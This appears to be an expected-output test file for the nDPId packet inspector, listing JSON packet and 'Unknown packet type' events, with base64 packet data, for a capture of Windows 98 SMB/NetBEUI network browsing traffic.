00524{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":135,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAFQQBfIgBAAAAAABNREpSOTgA"} 00510{"packet_event_id":1,"packet_event_name":"packet","packet_id":135,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAFQQBfIgBAAAAAABNREpSOTgA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":135,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154,"global_ts_msec":1576409888477} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":135,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154,"global_ts_msec":1576409888477}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":136,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AFBWM3ieAAwp1HmyABLw8CogDgD\/7x8AAAAAAAAAFQP\/U01CBAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":136,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AFBWM3ieAAwp1HmyABLw8CogDgD\/7x8AAAAAAAAAFQP\/U01CBAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":136,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409888973} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":136,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409888973}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":137,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AAwp1HmyAFBWM3ieAATw8QEsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":137,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AAwp1HmyAFBWM3ieAATw8QEsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAg"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":137,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409888973} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":137,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409888973}
00524{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":138,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAFQQBfIgBAAAAAABNREpSOTgA"} 00510{"packet_event_id":1,"packet_event_name":"packet","packet_id":138,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAFQQBfIgBAAAAAABNREpSOTgA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":138,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154,"global_ts_msec":1576409889485} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":138,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154,"global_ts_msec":1576409889485}
00524{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":139,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAFQQBfIgBAAAAAABNREpSOTgA"} 00510{"packet_event_id":1,"packet_event_name":"packet","packet_id":139,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAFQQBfIgBAAAAAABNREpSOTgA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":139,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154,"global_ts_msec":1576409890489} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":139,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154,"global_ts_msec":1576409890489}
00524{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":140,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAFQQBfIgBAAAAAABNREpSOTgA"} 00510{"packet_event_id":1,"packet_event_name":"packet","packet_id":140,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAFQQBfIgBAAAAAABNREpSOTgA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":140,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154,"global_ts_msec":1576409891489} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":140,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154,"global_ts_msec":1576409891489}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":142,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409891609,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAFwAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHQ=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":142,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409891609,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAFwAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHQ=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":142,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409892489} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":142,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409892489}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":143,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409891609,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAFwAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHQ=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":143,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409891609,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAFwAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHQ=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":143,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409893317} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":143,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409893317}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":145,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409893769,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAFwAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHQ=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":145,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409893769,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAFwAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHQ=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":145,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409894273} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":145,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409894273}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":147,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409894785,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAGABXT1JLR1JPVVAgICAgICAdAQJfX01TQlJPV1NFX18CAQ=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":147,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409894785,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAGABXT1JLR1JPVVAgICAgICAdAQJfX01TQlJPV1NFX18CAQ=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":147,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409895177} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":147,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409895177}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":149,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409895741,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAGABXT1JLR1JPVVAgICAgICAdAQJfX01TQlJPV1NFX18CAQ=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":149,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409895741,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAGABXT1JLR1JPVVAgICAgICAdAQJfX01TQlJPV1NFX18CAQ=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":149,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409895982} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":149,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409895982}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":151,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409896749,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAQJfX01TQlJPV1NFX18CAQ=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":151,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409896749,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAQJfX01TQlJPV1NFX18CAQ=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":151,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409896865} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":151,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409896865}
00508{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":152,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409896749,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"} 00494{"packet_event_id":1,"packet_event_name":"packet","packet_id":152,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409896749,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":152,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409897721} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":152,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409897721}
00508{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":153,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409896749,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAAABAl9fTVNCUk9XU0VfXwIBTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"} 00494{"packet_event_id":1,"packet_event_name":"packet","packet_id":153,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409896749,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAAABAl9fTVNCUk9XU0VfXwIBTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":153,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409897722} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":153,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409897722}
00540{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":155,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":180,"pkt_type":166,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":180,"pkt_l4_len":0,"thread_ts_msec":1576409897749,"pkt":"AwAAAAABAFBWM3ieAKbw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UADwXA1AEATURKUjk4AAAAAAAAAAAAAAQAAyBFABUEVaoA"} 00526{"packet_event_id":1,"packet_event_name":"packet","packet_id":155,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":180,"pkt_type":166,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":180,"pkt_l4_len":0,"thread_ts_msec":1576409897749,"pkt":"AwAAAAABAFBWM3ieAKbw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UADwXA1AEATURKUjk4AAAAAAAAAAAAAAQAAyBFABUEVaoA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":155,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":166,"global_ts_msec":1576409897781} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":155,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":166,"global_ts_msec":1576409897781}
00398{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":156,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":74,"pkt_type":60,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":74,"pkt_l4_len":0,"thread_ts_msec":1576409897749,"pkt":"AFBWM3ieAAwp1HmyADzw8CwgDgD\/7xYEAAAAABAAFQP\/U01CAAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAABAgAHAARcVEVTVAA="} 00384{"packet_event_id":1,"packet_event_name":"packet","packet_id":156,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":74,"pkt_type":60,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":74,"pkt_l4_len":0,"thread_ts_msec":1576409897749,"pkt":"AFBWM3ieAAwp1HmyADzw8CwgDgD\/7xYEAAAAABAAFQP\/U01CAAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAABAgAHAARcVEVTVAA="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":156,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":60,"global_ts_msec":1576409898877} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":156,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":60,"global_ts_msec":1576409898877}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":157,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409897749,"pkt":"AAwp1HmyAFBWM3ieADXw8CAuDgD\/7xYMAAAQACgAAxX\/U01CAAAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAAABAgAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":157,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409897749,"pkt":"AAwp1HmyAFBWM3ieADXw8CAuDgD\/7xYMAAAQACgAAxX\/U01CAAAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAAABAgAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":157,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409898877} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":157,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409898877}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":158,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409897749,"pkt":"AFBWM3ieAAwp1HmyABLw8C4iDgD\/7xQAAAAoAAAAFQP\/U01CBgAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":158,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409897749,"pkt":"AFBWM3ieAAwp1HmyABLw8C4iDgD\/7xQAAAAoAAAAFQP\/U01CBgAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":158,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409898941} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":158,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409898941}
